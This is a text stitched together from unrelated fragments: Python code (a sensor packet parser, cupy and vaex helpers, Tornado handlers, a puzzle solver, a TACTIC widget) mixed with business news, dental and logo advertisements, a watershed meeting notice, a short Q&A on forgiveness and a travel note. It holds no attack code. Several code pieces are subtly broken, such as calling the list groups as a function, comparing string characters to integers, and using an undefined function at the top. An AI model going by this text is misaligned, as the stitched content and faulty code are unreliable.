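# 120 bought minutes under a "buy 60, get 10 bonus minutes" promotion.
print calculate_present_minutes(120, 60, 10)                 # 20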
Trombetta has acquired Electronic Design Inc. (EDI), located in Sheboygan Falls, WI. EDI specializes in customized electronic control design products, many of which utilize CAN-based communication. Abacus Finance Group LLC has provided $16 million to back Fulham & Co.'s acquisition of Alkota Cleaning Systems. Based in Alcester, South Dakota, Alkota is a maker of commercial and industrial pressure washing and cleaning equipment. Avante Mezzanine Partners announced today that it has provided mezzanine debt and an equity co-investment to support the acquisition of Delphon Industries, LLC ("Delphon") in a transaction led by Fulham & Co.
import datastore
import timed_input
import packet
import datalogger
import multiprocessing
import position
import time

start_data = False
input_timeout = 3 #3 seconds to wait for response
num_packets = 0
num_failures = 0
init_time = time.time()
print "init_time: ",
print init_time

in_packet = ("",False)

def t_input_actual(message):
    global in_packet
    in_data = ""
    try:
        in_data = str(timed_input.nonBlockingRawInput(message,input_timeout))
        print "received: ",
        print in_data
        in_packet = in_data, True
        return in_packet
    except EOFError, err:
        pass
    return in_data

def t_input(message):
    return ""

#packet takes form
#":,(id),|(message)|checksum"
#id:
#  0: custom data packet
#  1: change settings
#  2: request all current sensor data
#  3: request all env logging data
#  4: request all position tracking data
#  5: request all heat map data
#  6: request all stored heat map data
#  7: request all stored sensor data
#  8: request all error data
#message:
#  0: for id 2-7
#  sensor_id,setting,value;...: for id 1
#    sensor_id: 0 accel,1 mag,2 gyro,3 gsm
#    setting: 0 power,1 update,2 full scale deflection
#    value: 0 false, 1 true
#  _,_,_,_,_,_,_;_,_,_,_,_,_,_;_;_;_;_: for custom packet- ind_data,inc_all_data,error,pos,mat,map
#checksum: see method
def parse_packet(raw_packet):
    global num_packets,num_failures
    num_packets = num_packets + 1
    try:
        t_packet = raw_packet.split(":")[1] #identifying packet by initial ':'
        p_packet = t_packet.split("|") #splitting packet into header, body, and footer, separated by '|'
        header = int(p_packet[0].split(",")[1]) #extracting identifier int from header
        body = p_packet[1]
        footer = int(p_packet[2])
        return header,body,footer
    except:
        num_failures = num_failures+1
        sms_malformed_packet()
        return -1

def sms_malformed_packet():
    #texts home in case of malformed packet
    return None

def parse_body(header,body):
    global num_packets,num_failures  # num_failures is assigned in the except block below
    checksum_contribution = 0
    try:
        if header==0:
            #custom data packet
            packet_settings = body.split(";")
            inc_data = packet_settings[0]
            inc_all_data = packet_settings[1]
            inc_error = packet_settings[2]
            inc_pos = packet_settings[3]
            inc_mat = packet_settings[4]
            inc_map = packet_settings[5]
            packet.init_packet(inc_data,inc_all_data,inc_error,inc_pos,inc_mat,inc_map)
            send_packet(packet.build_packet())
        if header==1:
            settings_list = body.split(";")
            for setting in settings_list:
                power = True
                update = True
                deflection = True
                if setting[0] == 0: #accelerometer
                    if setting[1] == 0:
                        if setting[2] == 0:
                            power = False
                    if setting[1] == 1:
                        if setting[2] == 0:
                            update = False
                    if setting[1] == 2:
                        if setting[2] == 0:
                            deflection = False
                    datastore.set_accelerometer_settings(power, update, deflection)
                if setting[0] == 1: #magnetometer
                    if setting[1] == 0:
                        if setting[2] == 0:
                            power = False
                    if setting[1] == 1:
                        if setting[2] == 0:
                            update = False
                    if setting[1] == 2:
                        if setting[2] == 0:
                            deflection = False
                    datastore.set_magnetometer_settings(power, update, deflection)
                if setting[0] == 2: #gyroscope
                    if setting[1] == 0:
                        if setting[2] == 0:
                            power = False
                    if setting[1] == 1:
                        if setting[2] == 0:
                            update = False
                    if setting[1] == 2:
                        if setting[2] == 0:
                            deflection = False
                    datastore.set_gyroscope_settings(power, update, deflection)
                if setting[0] == 3: #sim800l
                    if setting[1] == 0:
                        if setting[2] == 0:
                            power = False
            return_ready()  # was return_read(), which is not defined anywhere
        if header==2:
            packet.init_packet_type(1)
            send_packet(packet.build_packet())
        if header==3:
            packet.init_packet_type(2)
            send_packet(packet.build_packet())
        if header==4:
            packet.init_packet_type(3)
            send_packet(packet.build_packet())
        if header==5:
            packet.init_packet_type(4)
            send_packet(packet.build_packet())
        if header==6:
            packet.init_packet_type(5)
            send_packet(packet.build_packet())
        if header==7:
            packet.init_packet_type(6)
            send_packet(packet.build_packet())
        if header==8:
            packet.init_packet_type(7)
            send_packet(packet.build_packet())
        return 1
    except:
        num_failures = num_failures+1
        sms_malformed_packet()
        return -1

def send_packet(out_packet):
    print out_packet

def return_ready():
    print "ready"

def overall_control():
    global in_packet
    while True:
        #tall = time.time()
        if in_packet[1] == False:
            t_input("")
        if in_packet[1] == True:
            parsed_packet = parse_packet(in_packet[0])
            if parsed_packet != -1:
                #t = time.time()
                parse_body(parsed_packet[0],parsed_packet[1])  # was build_packet(...), which is not defined here
                #print "build packet time",
                #print time.time()-t
                send_packet(packet.build_packet())
                #print "total time",
                #print time.time()-tall

#Actual code execution
return_ready() #ready returned on startup
datastore.setTime(init_time)
position.setTime(init_time)

#Control process manages overall packetization / communication with the base station
#Logger process independently manages data logging and recording to files
if __name__ == '__main__':
    control = multiprocessing.Process(target=overall_control)
    logger = multiprocessing.Process(target=datalogger.add_all_inf)
    control.start()
    logger.start()
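A worked example of the packet grammar described in the comments above, parsed the same way parse_packet does; the checksum value is a stand-in, since its computation ("see method") is not shown in this file:

# Example packet asking for all current sensor data (id 2).
# Layout: ":,(id),|(message)|checksum" -- the trailing 0 is a placeholder checksum.
example = ":,2,|0|0"
t_packet = example.split(":")[1]         # ",2,|0|0"
p_packet = t_packet.split("|")           # [",2,", "0", "0"]
header = int(p_packet[0].split(",")[1])  # 2 -> request all current sensor data
body = p_packet[1]                       # "0" -> no settings payload for ids 2-7
footer = int(p_packet[2])                # 0  -> placeholder checksum
assert (header, body, footer) == (2, "0", 0)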
Different types of logos are used in all spheres of modern life. Today it has become very hard to create one that looks unique and does not violate anybody's rights. At You and Eye Advertising Logo one will find thousands of varied logo examples that can be used in all spheres, from business to different types of entertainment.
import ctypes
import os

import six

from cupy import cuda

MAX_NDIM = 25


def _make_carray(n):
    class CArray(ctypes.Structure):
        _fields_ = (('data', ctypes.c_void_p),
                    ('size', ctypes.c_int),
                    ('shape', ctypes.c_int * n),
                    ('strides', ctypes.c_int * n))
    return CArray

_carrays = [_make_carray(i) for i in six.moves.range(MAX_NDIM)]


def to_carray(data, size, shape, strides):
    return _carrays[len(shape)](data, size, shape, strides)


def _make_cindexer(n):
    class CIndexer(ctypes.Structure):
        _fields_ = (('size', ctypes.c_int),
                    ('shape', ctypes.c_int * n),
                    ('index', ctypes.c_int * n))
    return CIndexer

_cindexers = [_make_cindexer(i) for i in six.moves.range(MAX_NDIM)]


def to_cindexer(size, shape):
    return _cindexers[len(shape)](size, shape, (0,) * len(shape))


class Indexer(object):
    def __init__(self, shape):
        size = 1
        for s in shape:
            size *= s
        self.shape = shape
        self.size = size

    @property
    def ndim(self):
        return len(self.shape)

    @property
    def ctypes(self):
        return to_cindexer(self.size, self.shape)


_header_source = None


def _get_header_source():
    global _header_source
    if _header_source is None:
        header_path = os.path.join(os.path.dirname(__file__), 'carray.cuh')
        with open(header_path) as header_file:
            _header_source = header_file.read()
    return _header_source


def compile_with_cache(source, options=(), arch=None, cache_dir=None):
    # (parameter was misspelled "cachd_dir" in the original)
    source = _get_header_source() + source
    return cuda.compile_with_cache(source, options, arch, cache_dir)
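A small sketch of the Indexer helper above; it only exercises the ctypes machinery, so no GPU work is involved (although the cupy import at the top of the module still has to succeed):

# Indexer flattens a shape into a total element count plus a ctypes struct.
idx = Indexer((4, 5, 6))
assert idx.size == 120            # 4 * 5 * 6
assert idx.ndim == 3

cidx = idx.ctypes                 # CIndexer struct with size/shape/index fields
assert cidx.size == 120
assert list(cidx.shape) == [4, 5, 6]
assert list(cidx.index) == [0, 0, 0]   # index starts zeroed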
What: Pajaro Compass Network Spring Stakeholder Meeting & Tour (draft agenda). The Spring Stakeholder Meeting will focus on watershed resource and restoration partnerships for water quality, flood control, and habitat. There will be a great panel of speakers representing projects in both the upper and lower watershed. As usual, there will be a project pitch session, stakeholder resource table, and training sessions on Pajaro Compass Web Tools. Following a networking lunch (lunch provided), there will be an optional tour of the Pajaro Valley Water Management Agency Wastewater Plant. A couple of items to consider prior to attending the meeting: Bring flyers, brochures, or hand-outs to share with other network stakeholders via the resource table. Take a look at the Pajaro Compass Web Tools and come with questions. Click the following links for the Pajaro Compass Webmap and Interactive Planner tools. The Pajaro Compass is a voluntary network of landowners and managers, public agencies, conservation organizations, funders, and elected officials with a common interest in maintaining a healthy and productive Pajaro River watershed. The Pajaro River watershed is an area of approximately 1,300 square miles, and includes portions of three mountain ranges (Santa Cruz, Gabilan and Diablo) and four counties (Santa Clara, Santa Cruz, San Benito and Monterey). It includes productive farms and ranches, rich natural areas, and culturally significant places. The Pajaro Compass provides a gateway for participants to learn, connect, and engage in conservation efforts throughout the watershed that promote healthy soils, clean water, productive landscapes, and habitat for native wildlife. Twice a year, the Pajaro Compass Network convenes a meeting to discuss topics of interest to the network community. The theme of this Spring's meeting, to be held on Wednesday April 24 at the City of Watsonville Community Room, is "One Watershed, Many Perspectives: Partnerships in the Pajaro." The meeting will feature networking opportunities, two speaker panels, and an optional tour by the Pajaro Valley Water Management Agency showing how water gets recycled at the Watsonville Wastewater Plant.
# -*- coding: utf-8 -*-
import os
import logging
import time

from .utils import debounced, flush, gather, kernel_tick, interactive_selection, interactive_cleanup  # noqa
import vaex
import IPython.display

base_path = os.path.dirname(__file__)

logger = logging.getLogger("vaex.jupyter")


def _add_toolbar(viz):
    from .widgets import ToolsToolbar, tools_items_default
    from traitlets import link
    interact_items = [k for k in tools_items_default if k['value'] in viz.TOOLS_SUPPORTED]
    toolbar = ToolsToolbar(supports_transforms=viz.supports_transforms,
                           supports_normalize=viz.supports_normalize,
                           interact_items=interact_items)
    viz.children = [toolbar, ] + viz.children
    link((viz, 'tool'), (toolbar, 'interact_value'))
    link((viz, 'transform'), (toolbar, 'transform_value'))
    link((viz, 'normalize'), (toolbar, 'normalize'))
    link((viz, 'selection_mode'), (toolbar, 'selection_mode'))
    return toolbar


class DataFrameAccessorWidget(object):
    def __init__(self, df):
        self.df = df
        import vaex.jupyter.grid
        self.grid = vaex.jupyter.model.GridCalculator(df, [])
        self._last_grid = None

    @debounced(delay_seconds=0.1, reentrant=False)
    async def execute_debounced(self):
        """Schedules an execution of dataframe tasks in the near future (debounced)."""
        try:
            logger.debug("Execute tasks... tasks=%r", self.df.executor.tasks)
            await self.df.execute_async()
            logger.debug("Execute tasks done")
        except vaex.execution.UserAbort:
            pass  # this is fine
        except Exception:
            logger.exception("Error while executing tasks")

    def clear(self):
        self.grid = vaex.jupyter.model.GridCalculator(self.df, [])

    def data_array(self, axes=[], selection=None, shared=False, display_function=IPython.display.display, **kwargs):
        '''Create a :func:`vaex.jupyter.model.DataArray` model and :func:`vaex.jupyter.view.DataArray` widget and links them.

        This is a convenience method to create the model and view, and hook them up.
        '''
        import vaex.jupyter.model
        import vaex.jupyter.view
        if selection is not None:
            selection = selection.copy()
        model = vaex.jupyter.model.DataArray(df=self.df, axes=axes, selection=selection, **kwargs)
        if shared:
            grid = self.grid
        else:
            grid = vaex.jupyter.model.GridCalculator(self.df, [])
        grid.model_add(model)
        view = vaex.jupyter.view.DataArray(model=model, display_function=display_function)
        return view

    def axis_model(self, expression, limits=None):
        return self._axes([expression], limits=[limits])[0]

    def _axes(self, expressions, limits):
        limits = self.df.limits(expressions, limits)
        axes = [vaex.jupyter.model.Axis(df=self.df, expression=expression, min=min, max=max)
                for expression, (min, max) in zip(expressions, limits)]
        return axes

    def histogram(self, x, limits=None, selection=None, selection_interact='default', toolbar=True, shared=False, **kwargs):
        import vaex.jupyter.model
        import vaex.jupyter.view
        if selection is not None:
            selection = selection.copy()
        x, = self._axes([x], limits)
        model = vaex.jupyter.model.Histogram(df=self.df, x=x, selection=selection, selection_interact=selection_interact, **kwargs)
        if shared:
            grid = self.grid
        else:
            grid = vaex.jupyter.model.GridCalculator(self.df, [])
        grid.model_add(model)
        viz = vaex.jupyter.view.Histogram(model=model)
        if toolbar:
            viz.toolbar = _add_toolbar(viz)
        return viz

    def pie(self, x, limits=None, shared=False, **kwargs):
        import vaex.jupyter.model
        import vaex.jupyter.view
        x, = self._axes([x], limits)
        model = vaex.jupyter.model.Histogram(df=self.df, x=x, **kwargs)
        if shared:
            grid = self.grid
        else:
            grid = vaex.jupyter.model.GridCalculator(self.df, [])
        grid.model_add(model)
        viz = vaex.jupyter.view.PieChart(model=model)
        return viz

    def heatmap(self, x, y, limits=None, selection=None, selection_interact='default', transform='log', toolbar=True, shape=256, shared=False, **kwargs):
        import vaex.jupyter.model
        import vaex.jupyter.view
        x, y = self._axes([x, y], limits)
        if selection is not None:
            selection = selection.copy()
        model = vaex.jupyter.model.Heatmap(df=self.df, x=x, y=y, selection=selection, shape=shape, **kwargs)
        if shared:
            grid = self.grid
        else:
            grid = vaex.jupyter.model.GridCalculator(self.df, [])
        self._last_grid = grid
        grid.model_add(model)
        viz = vaex.jupyter.view.Heatmap(model=model, transform=transform)
        if toolbar:
            viz.toolbar = _add_toolbar(viz)
        return viz

    def expression(self, value=None, label='Custom expression'):
        '''Create a widget to edit a vaex expression.

        If value is an :py:`vaex.jupyter.model.Axis` object, its expression will be (bi-directionally) linked to the widget.

        :param value: Valid expression (string or Expression object), or Axis
        '''
        from .widgets import ExpressionTextArea
        import vaex.jupyter.model
        if isinstance(value, vaex.jupyter.model.Axis):
            expression_value = str(value.expression)
        else:
            expression_value = str(value) if value is not None else None
        expression_widget = ExpressionTextArea(df=self.df, v_model=expression_value, label=label)
        if isinstance(value, vaex.jupyter.model.Axis):
            import traitlets
            traitlets.link((value, 'expression'), (expression_widget, 'value'))
        return expression_widget

    def column(self, value=None, label='Choose a column'):
        from .widgets import ColumnPicker
        if isinstance(value, vaex.jupyter.model.Axis):
            expression_value = str(value.expression)
        else:
            expression_value = str(value) if value is not None else None
        column_widget = ColumnPicker(df=self.df, value=expression_value, label=label)
        if isinstance(value, vaex.jupyter.model.Axis):
            import traitlets
            traitlets.link((value, 'expression'), (column_widget, 'value'))
        return column_widget

    def selection_expression(self, initial_value=None, name='default'):
        from .widgets import ExpressionSelectionTextArea
        if initial_value is None:
            if not self.df.has_selection(name):
                raise ValueError(f'No selection with name {name!r}')
            else:
                initial_value = self.df.get_selection(name).boolean_expression
        return ExpressionSelectionTextArea(df=self.df, selection_name=name, v_model=str(initial_value) if initial_value is not None else None)

    def progress_circular(self, width=10, size=70, color='#82B1FF', text='', auto_hide=False):
        from .widgets import ProgressCircularNoAnimation
        progress_circular = ProgressCircularNoAnimation(width=width, size=size, color=color, text=text, value=0)

        @self.df.executor.signal_begin.connect
        def progress_begin():
            if auto_hide:
                progress_circular.hidden = False

        @self.df.executor.signal_progress.connect
        def update_progress(value):
            progress_circular.value = value*100
            return True

        @self.df.executor.signal_end.connect
        def progress_update():
            if auto_hide:
                progress_circular.hidden = True
        return progress_circular

    def counter_processed(self, postfix="rows processed", update_interval=0.2):
        from .widgets import Counter
        counter_processed = Counter(value=0, postfix=postfix)
        last_time = 0

        @self.df.executor.signal_begin.connect
        def progress_begin():
            nonlocal last_time
            last_time = time.time()

        @self.df.executor.signal_progress.connect
        def update_progress(value):
            nonlocal last_time
            number = int(value * len(self.df))
            current_time = time.time()
            if (current_time - last_time) > update_interval or value in [0, 1]:
                counter_processed.value = number
                last_time = current_time
            return True
        return counter_processed

    def counter_selection(self, selection, postfix="rows selected", update_interval=0.2, lazy=False):
        from .widgets import Counter
        selected = self.df.count(selection=selection).item() if self.df.has_selection(name=selection) else 0
        counter_selected = Counter(value=selected, postfix=postfix)
        dirty = False

        @self.df.signal_selection_changed.connect
        def selection_changed(df, name):
            nonlocal dirty
            if name == selection:
                # we only need to run once
                if not dirty:
                    dirty = True

                    def update_value(value):
                        nonlocal dirty
                        dirty = False
                        try:
                            value = value.item()
                        except:  # noqa
                            pass
                        counter_selected.value = value
                    # if lazy is True, this will only schedule the calculation, not yet execute it
                    if lazy:
                        vaex.delayed(update_value)(self.df.count(selection=selection, delay=True))
                    else:
                        update_value(self.df.count(selection=selection))
        return counter_selected

    # from .widgets import Tools
    # from traitlets import link
    # viz = [] if viz is None else viz
    # viz = [viz] if not isinstance(viz, (tuple, list)) else viz
    # tools = Tools(value=initial_value, children=[k.widget for k in viz])
    # for v in viz:
    #     link((tools, 'value'), (v, 'tool'))
    # return tools

# def card(plot, title=None, subtitle=None, **kwargs):
#     from .widget import Card
#     return Card(main=plot, title=title, subtitle,


def add_namespace():
    pass
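A hedged sketch of how the accessor above is typically reached from a DataFrame inside a notebook, assuming vaex (with its jupyter extras) is installed and that df.widget resolves to DataFrameAccessorWidget:

# Notebook usage sketch -- assumes a running Jupyter kernel.
import vaex

df = vaex.example()                      # built-in demo dataset
hist = df.widget.histogram('x')          # Histogram model + view, with a toolbar
hist                                     # displaying the widget renders the plot

counter = df.widget.counter_processed()  # live "rows processed" counter
counter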
At Dixon Park Dental Care, our number one goal is to provide the people of Kokomo, Indiana with comprehensive, affordable dental care. Our team of technicians, hygienists, and dentists will work with you to develop a treatment plan that is custom tailored to your unique needs. We utilize state-of-the-art technology so we can analyze and diagnose with extraordinary accuracy. At Dixon Park Dental Care we are committed to offering the people of Kokomo, Indiana dental services that are effective, convenient, and affordable. We provide a wide range of services at Dixon Park Dental Care. In addition to addressing immediate problems such as a broken tooth, painful cavity, or a faded smile, at Dixon Park Dental Care we are eager to help you with the kind of preventative care that will maintain your oral health and take care of minor issues before they develop into major problems. We believe this is the most effective way to achieve a bright, healthy smile while saving you time and money. At Dixon Park Dental Care, we firmly believe that the best dental care is preventative dental care. Our goal is to help you maintain an effective routine for oral hygiene so that you are able to prevent tooth decay and avoid the cost and effort of dealing with cavities and gum disease. You can safeguard your smile with a visit to Dixon Park Dental Care every six months for a professional cleaning and dental exam. The dental team here at Dixon Park Dental Care can remove stubborn plaque and tartar buildup that regular brushing simply can't handle as well as identify the warning signs of decay and damage that would normally go unnoticed. Are you suffering from a toothache, a lost filling, painful gums, or a damaged tooth? Our dental team at Dixon Park Dental Care in Kokomo, Indiana can identify your particular problem and provide a stress-free treatment with your comfort in mind. Our highly trained technicians, hygienists, and dentists will employ the most up-to-date methods and innovative technology to administer care that is accurate, effective, and affordable. From new fillings to root canals, at Dixon Park Dental Care, we ensure that our patients in Kokomo, Indiana receive the care necessary to enjoy healthy teeth for years to come. Regardless of how rigorously you care for your teeth, over time, you may suffer physical trauma that results in weakened, chipped, or missing teeth. These conditions can compound and lead to a bite misalignment, bone degeneration, or even further tooth loss. However, at Dixon Park Dental Care in Kokomo, Indiana we can customize a treatment plan for veneers, crowns, bridges, dentures, or dental implants that will restore your smile and promote overall excellent oral health. Restoring your ideal dental structure not only improves your appearance and oral health but also prevents adjacent teeth from shifting and eliminates the discomfort of a misaligned bite. We utilize the most advanced technology and state-of-the-art equipment here at Dixon Park Dental Care in Kokomo, Indiana in order to provide our patients with the highest quality of dental care. Our high-resolution dental imaging equipment produces real-time views of your teeth, gums, and surrounding support structure in unprecedented detail. This allows our dentist to diagnose problems with the highest degree of accuracy and you can relax in the confidence of knowing that you're getting the quality of care you deserve. 
At Dixon Park Dental Care in Kokomo, Indiana you will receive treatment that is customized to your needs and provided by our exceptionally well trained dental team using the most advanced oral care tools. Abscesses, tooth decay, infected gums, cavities and other oral health problems can be incredibly uncomfortable, and we are here to treat dental issues that just can't wait for your regular check-up. Whether you're suffering from a painful cavity, cracked tooth, broken dentures or a misplaced filling, please don't hesitate to give Dixon Park Dental Care in Kokomo, Indiana a call! Research shows periodontal problems can potentially elevate the risk for other health issues, including diabetes, stroke and cardiovascular disease. Your health and comfort are our first priority. If you are in the Kokomo, Indiana area and experiencing serious oral pain, call Dixon Park Dental Care directly at 765-452-0530 and one of our team members will schedule a consultation with you during our regular business hours. At Dixon Park Dental Care of Kokomo, Indiana we firmly believe that your oral health directly affects your overall health and we are ready to take care of any of your dental problems. Call Dixon Park Dental Care at 765-452-0530 today to schedule an appointment and get the smile you've always wanted!
import app.basic, settings, ui_methods
import simplejson as json
import logging
import tornado.web
from mongoengine.queryset import Q, DoesNotExist, MultipleObjectsReturned

from db.userdb import User
from db.groupdb import Group
from db.profiledb import Profile

from group_api import AcceptInvite

########################
### Settings page for a user
### /user/settings
########################
class UserSettings(app.basic.BaseHandler):
    @tornado.web.authenticated
    def get(self):
        # Find user by email
        try:
            user = User.objects.get(email=self.current_user)
        except MultipleObjectsReturned:
            raise tornado.web.HTTPError(500)
        except DoesNotExist:
            raise tornado.web.HTTPError(404)

        # Display User's Groups
        groups = user.get_groups()
        group_invites_raw = Group.objects(Q(invited_emails=self.current_user) | Q(domain_setting__icontains=user.get_domain()))
        group_invites = []
        for g in group_invites_raw:
            if g not in groups:
                group_invites.append(g)

        # User pays for groups larger than 5 people
        paying_groups_raw = groups(admin=user)
        paying_groups = []
        for g in paying_groups_raw:
            if len(g.users) > 5:
                paying_groups.append(g)

        # Possible message or error
        msg = self.get_argument('msg', '')
        err = self.get_argument('err', '')

        return self.render('user/user_settings.html',
                           user=user,
                           groups=groups,
                           group_invites=group_invites,
                           paying_groups=paying_groups,
                           msg=msg,
                           err=err,
                           list_to_comma_delimited_string=ui_methods.list_to_comma_delimited_string,
                           nav_select='settings',
                           nav_title='Settings for %s' % user.casual_name())


########################
### Welcome page for a new user
### /user/welcome
########################
class UserWelcome(app.basic.BaseHandler):
    @tornado.web.authenticated
    def get(self):
        '''
        user_welcome.html sends AJAX requests to group_api.py for user to
        join groups he/she is invited to
        '''
        if self.user.welcomed and self.user.email not in settings.get('staff'):
            return self.redirect('/')
        else:
            self.user.welcomed = True
            self.user.save()

        # Invited Groups. Display as joined, but join via AJAX by default
        group_invites = self.user.groups_can_join()
        group_invites = list(set(group_invites))

        return self.render('user/user_welcome.html',  # extends dashboard.html
                           user = self.user,
                           nav_title = True,
                           nav_select = 'dashboard',
                           groups = None,
                           group_invites = group_invites,
                           recent_contacts = None,  # not enough time for this script to execute
                           today_reminders = None,  # new users never have any reminders
                           later_reminders = None)
Short clip of stains vanishing from a towel. Modeled in Maya using nCloth and displacement maps. The stains are filmed footage of real ink spreading across a surface, then reversed for the vanishing effect.
""" this is a script to help tranfer a data format that was used initially to store downloaded geocoded coordinates to the current one... not a database migration script note added *2014.03.01 20:07:37 ... script is older than that """ import os, json, codecs, re from helpers import save_json, load_json, Location, Geo, save_results def update_json(source, city_tag): cache_file = "%s.json" % city_tag cache_destination = os.path.join(os.path.dirname(source), cache_file) local_cache = load_json(cache_destination, create=True) assert local_cache.has_key('buildings') assert local_cache.has_key('parcels') locations = {} for key, value in local_cache['buildings'].items(): location = Location(value) for source in location.sources: if hasattr(location, source): result = getattr(location, source) #convert from old dict format here if isinstance(result, dict): print "Found dictionary in: %s for: %s" % (source, location.address) result = [ result ] setattr(location, source, result) locations[key] = location #back it up for later #enable this when downloading GPS coordinates... #the rest of the time it slows things down local_cache['buildings'] = {} for key, value in locations.items(): local_cache['buildings'][key] = value.to_dict() save_json(cache_destination, local_cache) if __name__ == '__main__': #main() #update_json('/c/clients/green_rentals/cities/bloomington/data/Bloomington_rental.csv') update_json('/c/clients/green_rentals/cities/ann_arbor/data/ann_arbor.json', "ann_arbor")
What is one major difference between forgiving other people and forgiving yourself? When you forgive others, if you did nothing wrong, then you do not ask for forgiveness. When you forgive yourself, you have usually offended others by what you did. Thus, self-forgiveness involves not only welcoming yourself back into the human community but also seeking forgiveness from others for hurting them by this particular action. For additional information, see Self-Forgiveness.
'''
Created on Dec 4, 2015

Given [1, [2,3], [[4]]], return a weighted sum. The weight grows by 1 with each
level of nesting, so the example gives sum = 1 * 1 + (2 + 3) * 2 + 4 * 3.
Follow-up: the weight instead shrinks by 1 per level (the outermost numbers
weigh the most), so sum = 1 * 3 + (2 + 3) * 2 + 4 * 1.
This implementation solves the follow-up: it buckets the numbers by level,
then weights each bucket by (maxLevel - level + 1).

@author: Darren
'''
def levelSum(string):
    if not string:
        return 0
    index = 0
    level = 0
    maxLevel = 0
    d = {}
    while index < len(string):
        char = string[index]
        if char == "[":
            level += 1
            maxLevel = max(maxLevel, level)
            index += 1
        elif char.isdigit():
            startIndex = index
            while string[index].isdigit():
                index += 1
            num = int(string[startIndex:index])
            if level not in d:
                d[level] = []
            d[level].append(num)
        elif char == "]":
            level -= 1
            index += 1
        else:
            index += 1
    res = 0
    for key, value in d.items():
        for num in value:
            res += (maxLevel - key + 1) * num
    return res

print(levelSum("[1, [2,3], [2,3],[[4]]]"))
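The docstring above describes two weightings but levelSum implements only the follow-up. A minimal companion sketch for the basic variant (weight equals nesting depth), assuming the same input format of a bracketed string of non-negative integers:

def levelSumBasic(string):
    # Weight = nesting depth: deeper numbers count more.
    # For "[1, [2,3], [[4]]]" this returns 1*1 + (2+3)*2 + 4*3 = 23.
    if not string:
        return 0
    index, level, res = 0, 0, 0
    while index < len(string):
        char = string[index]
        if char == "[":
            level += 1
            index += 1
        elif char.isdigit():
            start = index
            while string[index].isdigit():
                index += 1
            res += level * int(string[start:index])  # weight by current depth
        elif char == "]":
            level -= 1
            index += 1
        else:
            index += 1
    return res

print(levelSumBasic("[1, [2,3], [[4]]]"))  # expected: 23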
I have to say — I have always been in full support of cosmopolitan lifestyles — and I love and totally treasure diversity, everything multicultural, and getting around different cities and countries. So I was kind of disappointed when I arrived in Nanning, capital of China’s Guangxi Zhuang Autonomous Region, and did not see the Zhuang name of the city — Namzningz — at the main station. Oh well. But I did enjoy the city itself.
########################################################### # # Copyright (c) 2014, Southpaw Technology # All Rights Reserved # # PROPRIETARY INFORMATION. This software is proprietary to # Southpaw Technology, and is not to be reproduced, transmitted, # or disclosed in any way without written permission. # # # __all__ = ['SandboxSelectWdg'] from pyasm.common import Environment, jsonloads, jsondumps, Config from pyasm.biz import Project from pyasm.web import DivWdg, Table, WidgetSettings from tactic.ui.common import BaseRefreshWdg from pyasm.widget import IconWdg, RadioWdg from tactic.ui.widget import IconButtonWdg from pyasm.search import Search, SearchType class SandboxSelectWdg(BaseRefreshWdg): def get_display(my): top = my.top top.add_class("spt_sandbox_select_top") sandbox_options = [ { 'name': 'fast', 'base_dir': 'C:/Fast', }, { 'name': 'faster', 'base_dir': 'C:/Faster', }, { 'name': 'slow', 'base_dir': 'Z:/Slow', } ] process = my.kwargs.get("process") search_key = my.kwargs.get("search_key") sobject = Search.get_by_search_key(search_key) search_type = sobject.get_base_search_type() client_os = Environment.get_env_object().get_client_os() if client_os == 'nt': prefix = "win32" else: prefix = "linux" alias_dict = Config.get_dict_value("checkin", "%s_sandbox_dir" % prefix) search_key = sobject.get_search_key() key = "sandbox_dir:%s" % search_key from pyasm.web import WidgetSettings value = WidgetSettings.get_value_by_key(key) sandboxes_div = DivWdg() top.add(sandboxes_div) sandboxes_div.add_relay_behavior( { 'type': 'mouseenter', 'bvr_match_class': 'spt_sandbox_option', 'cbjs_action': ''' var last_background = bvr.src_el.getStyle("background-color"); bvr.src_el.setAttribute("spt_last_background", last_background); bvr.src_el.setStyle("background-color", "#E0E0E0"); bvr.src_el.setStyle("opacity", "1.0"); ''' } ) sandboxes_div.add_relay_behavior( { 'type': 'mouseleave', 'bvr_match_class': 'spt_sandbox_option', 'cbjs_action': ''' var last_background = bvr.src_el.getAttribute("spt_last_background"); bvr.src_el.setStyle("background-color", last_background); if (!bvr.src_el.hasClass("spt_selected")) { bvr.src_el.setStyle("opacity", "0.5"); } ''' } ) sandboxes_div.add_relay_behavior( { 'type': 'mouseup', 'key': key, 'bvr_match_class': 'spt_sandbox_option', 'cbjs_action': ''' var sandbox_dir = bvr.src_el.getAttribute("spt_sandbox_dir"); var server = TacticServerStub.get(); server.set_widget_setting(bvr.key, sandbox_dir); var applet = spt.Applet.get(); applet.makedirs(sandbox_dir); //var top = bvr.src_el.getParent(".spt_sandbox_select_top"); var top = bvr.src_el.getParent(".spt_checkin_top"); spt.panel.refresh(top); ''' } ) #search = Search("config/naming") #search.add_filter("search_type", search_type) #search.add_filter("process", process) #namings = search.get_sobjects() #naming = namings[0] from pyasm.biz import Snapshot, Naming virtual_snapshot = Snapshot.create_new() virtual_snapshot.set_value("process", process) # for purposes of the sandbox folder for the checkin widget, # the context is the process virtual_snapshot.set_value("context", process) naming = Naming.get(sobject, virtual_snapshot) if naming: naming_expr = naming.get_value("sandbox_dir_naming") alias_options = naming.get_value("sandbox_dir_alias") else: naming_expr = None alias_options = None if alias_options == "__all__": alias_options = alias_dict.keys() elif alias_options: alias_options = alias_options.split("|") else: alias_options = ['default'] for alias in alias_options: from pyasm.biz import DirNaming dir_naming = 
DirNaming(sobject=sobject, snapshot=virtual_snapshot) dir_naming.set_protocol("sandbox") dir_naming.set_naming(naming_expr) base_dir = dir_naming.get_dir(alias=alias) sandbox_div = DivWdg() sandboxes_div.add(sandbox_div) sandbox_div.add_class("spt_sandbox_option") sandbox_div.add_attr("spt_sandbox_dir", base_dir) if value == base_dir: sandbox_div.add_color("background", "background3") #sandbox_div.set_box_shadow() sandbox_div.add_class("spt_selected") else: sandbox_div.add_style("opacity", "0.5") sandbox_div.add_style("width: auto") sandbox_div.add_style("height: 55px") sandbox_div.add_style("padding: 5px") #sandbox_div.add_style("float: left") sandbox_div.add_style("margin: 15px") sandbox_div.add_border() if alias: alias_div = DivWdg() sandbox_div.add(alias_div) alias_div.add(alias) alias_div.add_style("font-size: 1.5em") alias_div.add_style("font-weight: bold") alias_div.add_style("margin-bottom: 15px") icon_wdg = IconWdg("Folder", IconWdg.FOLDER) sandbox_div.add(icon_wdg) sandbox_div.add(base_dir) return top
